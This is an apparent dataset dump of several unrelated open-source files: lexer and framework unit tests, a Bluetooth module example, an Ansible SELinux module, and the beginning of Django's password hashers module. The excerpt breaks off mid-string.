Dataset schema (column name, type, value length range):
  repo_name  string, length 5-100
  ref        string, length 12-67
  path       string, length 4-244
  copies     string, length 1-8
  content    string, length 0-1.05M
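The records below pair repository metadata with the raw file contents. As a minimal sketch of how records with this schema could be iterated, assuming the listing comes from a Hugging Face-style dataset (the dataset identifier used here is a hypothetical placeholder, not given in this listing):

# Minimal sketch: iterate records that follow the schema above.
# "user/code-dump" is a hypothetical placeholder; substitute the real
# dataset path or local data files.
from datasets import load_dataset

ds = load_dataset("user/code-dump", split="train")
for record in ds:
    print(record["repo_name"], record["ref"], record["path"], record["copies"])
    print(record["content"][:200])  # first 200 characters of the file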
markeldigital/design-system
refs/heads/master
vendor/ruby/2.0.0/gems/pygments.rb-0.6.3/vendor/pygments-main/tests/test_qbasiclexer.py
29
# -*- coding: utf-8 -*-
"""
    Tests for QBasic
    ~~~~~~~~~~~~~~~~

    :copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

import glob
import os
import unittest

from pygments.token import Token
from pygments.lexers.qbasic import QBasicLexer


class QBasicTest(unittest.TestCase):
    def setUp(self):
        self.lexer = QBasicLexer()
        self.maxDiff = None

    def testKeywordsWithDollar(self):
        fragment = u'DIM x\nx = RIGHT$("abc", 1)\n'
        expected = [
            (Token.Keyword.Declaration, u'DIM'),
            (Token.Text.Whitespace, u' '),
            (Token.Name.Variable.Global, u'x'),
            (Token.Text, u'\n'),
            (Token.Name.Variable.Global, u'x'),
            (Token.Text.Whitespace, u' '),
            (Token.Operator, u'='),
            (Token.Text.Whitespace, u' '),
            (Token.Keyword.Reserved, u'RIGHT$'),
            (Token.Punctuation, u'('),
            (Token.Literal.String.Double, u'"abc"'),
            (Token.Punctuation, u','),
            (Token.Text.Whitespace, u' '),
            (Token.Literal.Number.Integer.Long, u'1'),
            (Token.Punctuation, u')'),
            (Token.Text, u'\n'),
        ]
        self.assertEqual(expected, list(self.lexer.get_tokens(fragment)))
skiselev/upm
refs/heads/master
examples/python/hm11.py
7
#!/usr/bin/python # Author: Zion Orent <zorent@ics.com> # Copyright (c) 2015 Intel Corporation. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from __future__ import print_function import time, sys, signal, atexit from upm import pyupm_hm11 as upmHm11 def main(): # Instantiate a HM11 BLE Module on UART 0 my_ble_obj = upmHm11.HM11(0) ## Exit handlers ## # This stops python from printing a stacktrace when you hit control-C def SIGINTHandler(signum, frame): raise SystemExit # This function lets you run code on exit, # including functions from my_ble_obj def exitHandler(): print("Exiting") sys.exit(0) # Register exit handlers atexit.register(exitHandler) signal.signal(signal.SIGINT, SIGINTHandler) bufferLength = 256 # make sure port is initialized properly. 9600 baud is the default. if (not my_ble_obj.setupTty(upmHm11.cvar.int_B9600)): print("Failed to setup tty port parameters") sys.exit(0) usageStr = ("Usage:\n" "Pass a commandline argument (any argument) to this program\n" "to query the radio configuration and output it. NOTE: the\n" "radio must be in CONFIG mode for this to work.\n\n" "Running this program without arguments will simply transmit\n" "'Hello World!' every second, and output any data received from\n" "another radio.\n\n") print(usageStr) # simple helper function to send a command and wait for a response def sendCommand(bleObj, cmd): bleBuffer = upmHm11.charArray(bufferLength) bleObj.writeData(cmd, len(cmd)) # wait up to 1 second if (bleObj.dataAvailable(1000)): bleObj.readData(bleBuffer, bufferLength) bleData = "" # read only the number of characters # specified by myGPSSensor.readData for x in range(0, bufferLength): if (bleBuffer.__getitem__(x) == '\0'): break else: bleData += bleBuffer.__getitem__(x) print(bleData) else: print("Timed out waiting for response") if (len(sys.argv) > 1): print("Sending command line argument (" + sys.argv[1] + ")...") sendCommand(my_ble_obj, sys.argv[1]) else: # query the module address addr = "AT+ADDR?"; print("Querying module address (" + addr + ")...") sendCommand(my_ble_obj, addr) time.sleep(1) # query the module address pin = "AT+PASS?"; print("Querying module PIN (" + pin + ")...") sendCommand(my_ble_obj, pin) # Other potentially useful commands are: # # AT+VERS? 
- query module version # AT+ROLE0 - set as slave # AT+ROLE1 - set as master # AT+CLEAR - clear all previous settings # AT+RESET - restart the device # # A comprehensive list is available from the datasheet at: # http://www.seeedstudio.com/wiki/images/c/cd/Bluetooth4_en.pdf if __name__ == '__main__': main()
gvb/odoo
refs/heads/8.0
openerp/addons/test_new_api/tests/test_related.py
247
# # test cases for related fields, etc. # import unittest from openerp.osv import fields from openerp.tests import common class TestRelatedField(common.TransactionCase): def setUp(self): super(TestRelatedField, self).setUp() self.partner = self.registry('res.partner') self.company = self.registry('res.company') def test_0_related(self): """ test an usual related field """ # find a company with a non-null partner_id ids = self.company.search(self.cr, self.uid, [('partner_id', '!=', False)], limit=1) id = ids[0] # find partners that satisfy [('partner_id.company_id', '=', id)] company_ids = self.company.search(self.cr, self.uid, [('partner_id', '=', id)]) partner_ids1 = self.partner.search(self.cr, self.uid, [('company_id', 'in', company_ids)]) partner_ids2 = self.partner.search(self.cr, self.uid, [('related_company_partner_id', '=', id)]) self.assertEqual(partner_ids1, partner_ids2) def do_test_company_field(self, field): # get a partner with a non-null company_id ids = self.partner.search(self.cr, self.uid, [('company_id', '!=', False)], limit=1) partner = self.partner.browse(self.cr, self.uid, ids[0]) # check reading related field self.assertEqual(partner[field], partner.company_id) # check that search on related field is equivalent to original field ids1 = self.partner.search(self.cr, self.uid, [('company_id', '=', partner.company_id.id)]) ids2 = self.partner.search(self.cr, self.uid, [(field, '=', partner.company_id.id)]) self.assertEqual(ids1, ids2) def test_1_single_related(self): """ test a related field with a single indirection like fields.related('foo') """ self.do_test_company_field('single_related_company_id') def test_2_related_related(self): """ test a related field referring to a related field """ self.do_test_company_field('related_related_company_id') def test_3_read_write(self): """ write on a related field """ # find a company with a non-null partner_id company_ids = self.company.search(self.cr, self.uid, [('partner_id', '!=', False)], limit=1) company = self.company.browse(self.cr, self.uid, company_ids[0]) # find partners that satisfy [('company_id.partner_id', '=', company.partner_id.id)] partner_ids = self.partner.search(self.cr, self.uid, [('related_company_partner_id', '=', company.partner_id.id)]) self.assertGreater(len(partner_ids), 0) partner = self.partner.browse(self.cr, self.uid, partner_ids[0]) # create a new partner, and assign it to company new_partner_id = self.partner.create(self.cr, self.uid, {'name': 'Foo'}) partner.write({'related_company_partner_id': new_partner_id}) company = self.company.browse(self.cr, self.uid, company_ids[0]) self.assertEqual(company.partner_id.id, new_partner_id) partner = self.partner.browse(self.cr, self.uid, partner_ids[0]) self.assertEqual(partner.related_company_partner_id.id, new_partner_id) class TestPropertyField(common.TransactionCase): def setUp(self): super(TestPropertyField, self).setUp() self.user = self.registry('res.users') self.partner = self.registry('res.partner') self.company = self.registry('res.company') self.country = self.registry('res.country') self.property = self.registry('ir.property') self.imd = self.registry('ir.model.data') @unittest.skip("invalid monkey-patching") def test_1_property_multicompany(self): cr, uid = self.cr, self.uid parent_company_id = self.imd.get_object_reference(cr, uid, 'base', 'main_company')[1] country_be = self.imd.get_object_reference(cr, uid, 'base', 'be')[1] country_fr = self.imd.get_object_reference(cr, uid, 'base', 'fr')[1] group_partner_manager = 
self.imd.get_object_reference(cr, uid, 'base', 'group_partner_manager')[1] group_multi_company = self.imd.get_object_reference(cr, uid, 'base', 'group_multi_company')[1] sub_company = self.company.create(cr, uid, {'name': 'MegaCorp', 'parent_id': parent_company_id}) alice = self.user.create(cr, uid, {'name': 'Alice', 'login':'alice', 'email':'alice@youcompany.com', 'company_id':parent_company_id, 'company_ids':[(6, 0, [parent_company_id, sub_company])], 'country_id':country_be, 'groups_id': [(6, 0, [group_partner_manager, group_multi_company])] }) bob = self.user.create(cr, uid, {'name': 'Bob', 'login':'bob', 'email':'bob@megacorp.com', 'company_id':sub_company, 'company_ids':[(6, 0, [parent_company_id, sub_company])], 'country_id':country_fr, 'groups_id': [(6, 0, [group_partner_manager, group_multi_company])] }) self.partner._columns = dict(self.partner._columns) self.partner._columns.update({ 'property_country': fields.property(type='many2one', relation="res.country", string="Country by company"), }) self.partner._field_create(cr) partner_id = self.partner.create(cr, alice, { 'name': 'An International Partner', 'email': 'partner@example.com', 'company_id': parent_company_id, }) self.partner.write(cr, bob, [partner_id], {'property_country': country_fr}) self.assertEqual(self.partner.browse(cr, bob, partner_id).property_country.id, country_fr, "Bob does not see the value he has set on the property field") self.partner.write(cr, alice, [partner_id], {'property_country': country_be}) self.assertEqual(self.partner.browse(cr, alice, partner_id).property_country.id, country_be, "Alice does not see the value he has set on the property field") self.assertEqual(self.partner.browse(cr, bob, partner_id).property_country.id, country_fr, "Changes made by Alice have overwritten Bob's value") class TestHtmlField(common.TransactionCase): def setUp(self): super(TestHtmlField, self).setUp() self.partner = self.registry('res.partner') def test_00_sanitize(self): cr, uid, context = self.cr, self.uid, {} old_columns = self.partner._columns self.partner._columns = dict(old_columns) self.partner._columns.update({ 'comment': fields.html('Secure Html', sanitize=False), }) some_ugly_html = """<p>Oops this should maybe be sanitized % if object.some_field and not object.oriented: <table> % if object.other_field: <tr style="border: 10px solid black;"> ${object.mako_thing} <td> </tr> % endif <tr> %if object.dummy_field: <p>Youpie</p> %endif""" pid = self.partner.create(cr, uid, { 'name': 'Raoul Poilvache', 'comment': some_ugly_html, }, context=context) partner = self.partner.browse(cr, uid, pid, context=context) self.assertEqual(partner.comment, some_ugly_html, 'Error in HTML field: content was sanitized but field has sanitize=False') self.partner._columns.update({ 'comment': fields.html('Unsecure Html', sanitize=True), }) self.partner.write(cr, uid, [pid], { 'comment': some_ugly_html, }, context=context) partner = self.partner.browse(cr, uid, pid, context=context) # sanitize should have closed tags left open in the original html self.assertIn('</table>', partner.comment, 'Error in HTML field: content does not seem to have been sanitized despise sanitize=True') self.assertIn('</td>', partner.comment, 'Error in HTML field: content does not seem to have been sanitized despise sanitize=True') self.assertIn('<tr style="', partner.comment, 'Style attr should not have been stripped') self.partner._columns['comment'] = fields.html('Stripped Html', sanitize=True, strip_style=True) self.partner.write(cr, uid, [pid], 
{'comment': some_ugly_html}, context=context) partner = self.partner.browse(cr, uid, pid, context=context) self.assertNotIn('<tr style="', partner.comment, 'Style attr should have been stripped') self.partner._columns = old_columns
mahak/ansible
refs/heads/devel
test/support/integration/plugins/modules/sefcontext.py
18
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2016, Dag Wieers (@dagwieers) <dag@wieers.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: sefcontext short_description: Manages SELinux file context mapping definitions description: - Manages SELinux file context mapping definitions. - Similar to the C(semanage fcontext) command. version_added: '2.2' options: target: description: - Target path (expression). type: str required: yes aliases: [ path ] ftype: description: - The file type that should have SELinux contexts applied. - "The following file type options are available:" - C(a) for all files, - C(b) for block devices, - C(c) for character devices, - C(d) for directories, - C(f) for regular files, - C(l) for symbolic links, - C(p) for named pipes, - C(s) for socket files. type: str choices: [ a, b, c, d, f, l, p, s ] default: a setype: description: - SELinux type for the specified target. type: str required: yes seuser: description: - SELinux user for the specified target. type: str selevel: description: - SELinux range for the specified target. type: str aliases: [ serange ] state: description: - Whether the SELinux file context must be C(absent) or C(present). type: str choices: [ absent, present ] default: present reload: description: - Reload SELinux policy after commit. - Note that this does not apply SELinux file contexts to existing files. type: bool default: yes ignore_selinux_state: description: - Useful for scenarios (chrooted environment) that you can't get the real SELinux state. type: bool default: no version_added: '2.8' notes: - The changes are persistent across reboots. - The M(sefcontext) module does not modify existing files to the new SELinux context(s), so it is advisable to first create the SELinux file contexts before creating files, or run C(restorecon) manually for the existing files that require the new SELinux file contexts. - Not applying SELinux fcontexts to existing files is a deliberate decision as it would be unclear what reported changes would entail to, and there's no guarantee that applying SELinux fcontext does not pick up other unrelated prior changes. requirements: - libselinux-python - policycoreutils-python author: - Dag Wieers (@dagwieers) ''' EXAMPLES = r''' - name: Allow apache to modify files in /srv/git_repos sefcontext: target: '/srv/git_repos(/.*)?' 
setype: httpd_git_rw_content_t state: present - name: Apply new SELinux file context to filesystem command: restorecon -irv /srv/git_repos ''' RETURN = r''' # Default return values ''' import os import subprocess import traceback from ansible.module_utils.basic import AnsibleModule, missing_required_lib from ansible.module_utils.common.respawn import has_respawned, probe_interpreters_for_module, respawn_module from ansible.module_utils._text import to_native SELINUX_IMP_ERR = None try: import selinux HAVE_SELINUX = True except ImportError: SELINUX_IMP_ERR = traceback.format_exc() HAVE_SELINUX = False SEOBJECT_IMP_ERR = None try: import seobject HAVE_SEOBJECT = True except ImportError: SEOBJECT_IMP_ERR = traceback.format_exc() HAVE_SEOBJECT = False # Add missing entries (backward compatible) if HAVE_SEOBJECT: seobject.file_types.update( a=seobject.SEMANAGE_FCONTEXT_ALL, b=seobject.SEMANAGE_FCONTEXT_BLOCK, c=seobject.SEMANAGE_FCONTEXT_CHAR, d=seobject.SEMANAGE_FCONTEXT_DIR, f=seobject.SEMANAGE_FCONTEXT_REG, l=seobject.SEMANAGE_FCONTEXT_LINK, p=seobject.SEMANAGE_FCONTEXT_PIPE, s=seobject.SEMANAGE_FCONTEXT_SOCK, ) # Make backward compatible option_to_file_type_str = dict( a='all files', b='block device', c='character device', d='directory', f='regular file', l='symbolic link', p='named pipe', s='socket', ) def get_runtime_status(ignore_selinux_state=False): return True if ignore_selinux_state is True else selinux.is_selinux_enabled() def semanage_fcontext_exists(sefcontext, target, ftype): ''' Get the SELinux file context mapping definition from policy. Return None if it does not exist. ''' # Beware that records comprise of a string representation of the file_type record = (target, option_to_file_type_str[ftype]) records = sefcontext.get_all() try: return records[record] except KeyError: return None def semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser, sestore=''): ''' Add or modify SELinux file context mapping definition to the policy. 
''' changed = False prepared_diff = '' try: sefcontext = seobject.fcontextRecords(sestore) sefcontext.set_reload(do_reload) exists = semanage_fcontext_exists(sefcontext, target, ftype) if exists: # Modify existing entry orig_seuser, orig_serole, orig_setype, orig_serange = exists if seuser is None: seuser = orig_seuser if serange is None: serange = orig_serange if setype != orig_setype or seuser != orig_seuser or serange != orig_serange: if not module.check_mode: sefcontext.modify(target, setype, ftype, serange, seuser) changed = True if module._diff: prepared_diff += '# Change to semanage file context mappings\n' prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, orig_seuser, orig_serole, orig_setype, orig_serange) prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, orig_serole, setype, serange) else: # Add missing entry if seuser is None: seuser = 'system_u' if serange is None: serange = 's0' if not module.check_mode: sefcontext.add(target, setype, ftype, serange, seuser) changed = True if module._diff: prepared_diff += '# Addition to semanage file context mappings\n' prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, 'object_r', setype, serange) except Exception as e: module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e))) if module._diff and prepared_diff: result['diff'] = dict(prepared=prepared_diff) module.exit_json(changed=changed, seuser=seuser, serange=serange, **result) def semanage_fcontext_delete(module, result, target, ftype, do_reload, sestore=''): ''' Delete SELinux file context mapping definition from the policy. ''' changed = False prepared_diff = '' try: sefcontext = seobject.fcontextRecords(sestore) sefcontext.set_reload(do_reload) exists = semanage_fcontext_exists(sefcontext, target, ftype) if exists: # Remove existing entry orig_seuser, orig_serole, orig_setype, orig_serange = exists if not module.check_mode: sefcontext.delete(target, ftype) changed = True if module._diff: prepared_diff += '# Deletion to semanage file context mappings\n' prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, exists[0], exists[1], exists[2], exists[3]) except Exception as e: module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e))) if module._diff and prepared_diff: result['diff'] = dict(prepared=prepared_diff) module.exit_json(changed=changed, **result) def main(): module = AnsibleModule( argument_spec=dict( ignore_selinux_state=dict(type='bool', default=False), target=dict(type='str', required=True, aliases=['path']), ftype=dict(type='str', default='a', choices=option_to_file_type_str.keys()), setype=dict(type='str', required=True), seuser=dict(type='str'), selevel=dict(type='str', aliases=['serange']), state=dict(type='str', default='present', choices=['absent', 'present']), reload=dict(type='bool', default=True), ), supports_check_mode=True, ) if not HAVE_SELINUX or not HAVE_SEOBJECT and not has_respawned(): system_interpreters = [ '/usr/libexec/platform-python', '/usr/bin/python3', '/usr/bin/python2', ] # policycoreutils-python depends on libselinux-python interpreter = probe_interpreters_for_module(system_interpreters, 'seobject') if interpreter: respawn_module(interpreter) if not HAVE_SELINUX or not HAVE_SEOBJECT: module.fail_json(msg=missing_required_lib("policycoreutils-python(3)"), exception=SELINUX_IMP_ERR) ignore_selinux_state = module.params['ignore_selinux_state'] if not get_runtime_status(ignore_selinux_state): module.fail_json(msg="SELinux is disabled on this host.") target = module.params['target'] 
ftype = module.params['ftype'] setype = module.params['setype'] seuser = module.params['seuser'] serange = module.params['selevel'] state = module.params['state'] do_reload = module.params['reload'] result = dict(target=target, ftype=ftype, setype=setype, state=state) if state == 'present': semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser) elif state == 'absent': semanage_fcontext_delete(module, result, target, ftype, do_reload) else: module.fail_json(msg='Invalid value of argument "state": {0}'.format(state)) if __name__ == '__main__': main()
tempbottle/rethinkdb
refs/heads/next
external/v8_3.30.33.16/testing/gtest/test/gtest_list_tests_unittest.py
1898
#!/usr/bin/env python # # Copyright 2006, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for Google Test's --gtest_list_tests flag. A user can ask Google Test to list all tests by specifying the --gtest_list_tests flag. This script tests such functionality by invoking gtest_list_tests_unittest_ (a program written with Google Test) the command line flags. """ __author__ = 'phanna@google.com (Patrick Hanna)' import gtest_test_utils import re # Constants. # The command line flag for enabling/disabling listing all tests. LIST_TESTS_FLAG = 'gtest_list_tests' # Path to the gtest_list_tests_unittest_ program. EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_') # The expected output when running gtest_list_tests_unittest_ with # --gtest_list_tests EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\. Test1 Foo\. Bar1 Bar2 DISABLED_Bar3 Abc\. Xyz Def FooBar\. Baz FooTest\. Test1 DISABLED_Test2 Test3 TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\. TestA TestB TypedTest/1\. # TypeParam = int\s*\* TestA TestB TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42> TestA TestB My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\. TestA TestB My/TypeParamTest/1\. # TypeParam = int\s*\* TestA TestB My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42> TestA TestB MyInstantiation/ValueParamTest\. TestA/0 # GetParam\(\) = one line TestA/1 # GetParam\(\) = two\\nlines TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\. TestB/0 # GetParam\(\) = one line TestB/1 # GetParam\(\) = two\\nlines TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\. """) # The expected output when running gtest_list_tests_unittest_ with # --gtest_list_tests and --gtest_filter=Foo*. EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\. Test1 Foo\. Bar1 Bar2 DISABLED_Bar3 FooBar\. Baz FooTest\. Test1 DISABLED_Test2 Test3 """) # Utilities. def Run(args): """Runs gtest_list_tests_unittest_ and returns the list of tests printed.""" return gtest_test_utils.Subprocess([EXE_PATH] + args, capture_stderr=False).output # The unit test. 
class GTestListTestsUnitTest(gtest_test_utils.TestCase): """Tests using the --gtest_list_tests flag to list all tests.""" def RunAndVerify(self, flag_value, expected_output_re, other_flag): """Runs gtest_list_tests_unittest_ and verifies that it prints the correct tests. Args: flag_value: value of the --gtest_list_tests flag; None if the flag should not be present. expected_output_re: regular expression that matches the expected output after running command; other_flag: a different flag to be passed to command along with gtest_list_tests; None if the flag should not be present. """ if flag_value is None: flag = '' flag_expression = 'not set' elif flag_value == '0': flag = '--%s=0' % LIST_TESTS_FLAG flag_expression = '0' else: flag = '--%s' % LIST_TESTS_FLAG flag_expression = '1' args = [flag] if other_flag is not None: args += [other_flag] output = Run(args) if expected_output_re: self.assert_( expected_output_re.match(output), ('when %s is %s, the output of "%s" is "%s",\n' 'which does not match regex "%s"' % (LIST_TESTS_FLAG, flag_expression, ' '.join(args), output, expected_output_re.pattern))) else: self.assert_( not EXPECTED_OUTPUT_NO_FILTER_RE.match(output), ('when %s is %s, the output of "%s" is "%s"'% (LIST_TESTS_FLAG, flag_expression, ' '.join(args), output))) def testDefaultBehavior(self): """Tests the behavior of the default mode.""" self.RunAndVerify(flag_value=None, expected_output_re=None, other_flag=None) def testFlag(self): """Tests using the --gtest_list_tests flag.""" self.RunAndVerify(flag_value='0', expected_output_re=None, other_flag=None) self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE, other_flag=None) def testOverrideNonFilterFlags(self): """Tests that --gtest_list_tests overrides the non-filter flags.""" self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE, other_flag='--gtest_break_on_failure') def testWithFilterFlags(self): """Tests that --gtest_list_tests takes into account the --gtest_filter flag.""" self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE, other_flag='--gtest_filter=Foo*') if __name__ == '__main__': gtest_test_utils.Main()
dancingdan/tensorflow
refs/heads/master
tensorflow/contrib/nearest_neighbor/python/kernel_tests/hyperplane_lsh_probes_test.py
25
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for hyperplane_lsh_probes."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np

from tensorflow.contrib.nearest_neighbor.python.ops.nearest_neighbor_ops import hyperplane_lsh_probes
from tensorflow.python.platform import test


class HyperplaneLshProbesTest(test.TestCase):

  # We only test the batch functionality of the op here because the multiprobe
  # tests in hyperplane_lsh_probes_test.cc already cover most of the LSH
  # functionality.

  def simple_batch_test(self):
    with self.cached_session():
      hyperplanes = np.eye(4)
      points = np.array([[1.2, 0.5, -0.9, -1.0], [2.0, -3.0, 1.0, -1.5]])
      product = np.dot(points, hyperplanes)
      num_tables = 2
      num_hyperplanes_per_table = 2
      num_probes = 4
      hashes, tables = hyperplane_lsh_probes(product,
                                             num_tables,
                                             num_hyperplanes_per_table,
                                             num_probes)

      self.assertAllEqual(hashes.eval(), [[3, 0, 2, 2], [2, 2, 0, 3]])
      self.assertAllEqual(tables.eval(), [[0, 1, 0, 1], [0, 1, 1, 1]])


if __name__ == '__main__':
  test.main()
intgr/django
refs/heads/master
django/contrib/auth/hashers.py
45
import base64 import binascii import functools import hashlib import importlib import warnings from collections import OrderedDict from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.core.signals import setting_changed from django.dispatch import receiver from django.utils.crypto import ( constant_time_compare, get_random_string, pbkdf2, ) from django.utils.encoding import force_bytes, force_text from django.utils.module_loading import import_string from django.utils.translation import gettext_noop as _ UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX def is_password_usable(encoded): if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX): return False try: identify_hasher(encoded) except ValueError: return False return True def check_password(password, encoded, setter=None, preferred='default'): """ Return a boolean of whether the raw password matches the three part encoded digest. If setter is specified, it'll be called when you need to regenerate the password. """ if password is None or not is_password_usable(encoded): return False preferred = get_hasher(preferred) hasher = identify_hasher(encoded) hasher_changed = hasher.algorithm != preferred.algorithm must_update = hasher_changed or preferred.must_update(encoded) is_correct = hasher.verify(password, encoded) # If the hasher didn't change (we don't protect against enumeration if it # does) and the password should get updated, try to close the timing gap # between the work factor of the current encoded password and the default # work factor. if not is_correct and not hasher_changed and must_update: hasher.harden_runtime(password, encoded) if setter and is_correct and must_update: setter(password) return is_correct def make_password(password, salt=None, hasher='default'): """ Turn a plain-text password into a hash for database storage Same as encode() but generate a new random salt. If password is None then return a concatenation of UNUSABLE_PASSWORD_PREFIX and a random string, which disallows logins. Additional random string reduces chances of gaining access to staff or superuser accounts. See ticket #20079 for more info. """ if password is None: return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH) hasher = get_hasher(hasher) if not salt: salt = hasher.salt() return hasher.encode(password, salt) @functools.lru_cache() def get_hashers(): hashers = [] for hasher_path in settings.PASSWORD_HASHERS: hasher_cls = import_string(hasher_path) hasher = hasher_cls() if not getattr(hasher, 'algorithm'): raise ImproperlyConfigured("hasher doesn't specify an " "algorithm name: %s" % hasher_path) hashers.append(hasher) return hashers @functools.lru_cache() def get_hashers_by_algorithm(): return {hasher.algorithm: hasher for hasher in get_hashers()} @receiver(setting_changed) def reset_hashers(**kwargs): if kwargs['setting'] == 'PASSWORD_HASHERS': get_hashers.cache_clear() get_hashers_by_algorithm.cache_clear() def get_hasher(algorithm='default'): """ Return an instance of a loaded password hasher. If algorithm is 'default', return the default hasher. Lazily import hashers specified in the project's settings file if needed. 
""" if hasattr(algorithm, 'algorithm'): return algorithm elif algorithm == 'default': return get_hashers()[0] else: hashers = get_hashers_by_algorithm() try: return hashers[algorithm] except KeyError: raise ValueError("Unknown password hashing algorithm '%s'. " "Did you specify it in the PASSWORD_HASHERS " "setting?" % algorithm) def identify_hasher(encoded): """ Return an instance of a loaded password hasher. Identify hasher algorithm by examining encoded hash, and call get_hasher() to return hasher. Raise ValueError if algorithm cannot be identified, or if hasher is not loaded. """ # Ancient versions of Django created plain MD5 passwords and accepted # MD5 passwords with an empty salt. if ((len(encoded) == 32 and '$' not in encoded) or (len(encoded) == 37 and encoded.startswith('md5$$'))): algorithm = 'unsalted_md5' # Ancient versions of Django accepted SHA1 passwords with an empty salt. elif len(encoded) == 46 and encoded.startswith('sha1$$'): algorithm = 'unsalted_sha1' else: algorithm = encoded.split('$', 1)[0] return get_hasher(algorithm) def mask_hash(hash, show=6, char="*"): """ Return the given hash, with only the first ``show`` number shown. The rest are masked with ``char`` for security reasons. """ masked = hash[:show] masked += char * len(hash[show:]) return masked class BasePasswordHasher: """ Abstract base class for password hashers When creating your own hasher, you need to override algorithm, verify(), encode() and safe_summary(). PasswordHasher objects are immutable. """ algorithm = None library = None def _load_library(self): if self.library is not None: if isinstance(self.library, (tuple, list)): name, mod_path = self.library else: mod_path = self.library try: module = importlib.import_module(mod_path) except ImportError as e: raise ValueError("Couldn't load %r algorithm library: %s" % (self.__class__.__name__, e)) return module raise ValueError("Hasher %r doesn't specify a library attribute" % self.__class__.__name__) def salt(self): """Generate a cryptographically secure nonce salt in ASCII.""" return get_random_string() def verify(self, password, encoded): """Check if the given password is correct.""" raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method') def encode(self, password, salt): """ Create an encoded database value. The result is normally formatted as "algorithm$salt$hash" and must be fewer than 128 characters. """ raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() 